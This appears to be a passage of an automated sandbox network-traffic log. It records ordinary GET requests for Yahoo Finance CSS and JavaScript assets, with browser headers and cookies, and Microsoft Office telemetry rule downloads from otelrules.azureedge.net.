Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/PortfolioSymbolCount.CdFvEngM.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/EnhancedPill.Cw8es2Sk.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Dialogv2.Bk0tsnD7.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/DataTablePagination.lDuKHVf0.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/GradientScale.BwfNrsj8.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/SectionHeader.B9ETuNQk.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/LeafNewsStream.5uLOVnax.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/StoryStream.rnZSA-x3.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/StoryItem.CsmwoRFQ.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/StoryMetaPublishing.uqjoCQC9.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/TopicPill.Cd876vvj.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/SkeletonLoader.YZvit63q.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/NoContent.Dkv6jm1i.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/SectionWithSidebar.Bf-AwOOu.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/MarketsHeatmap.D2uTipvq.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/HeatMap.v9WG23fw.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/entry/start.CnQ-Ug7B.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/43.CtYdpA_T.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/scheduler.Dr9AAxFe.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
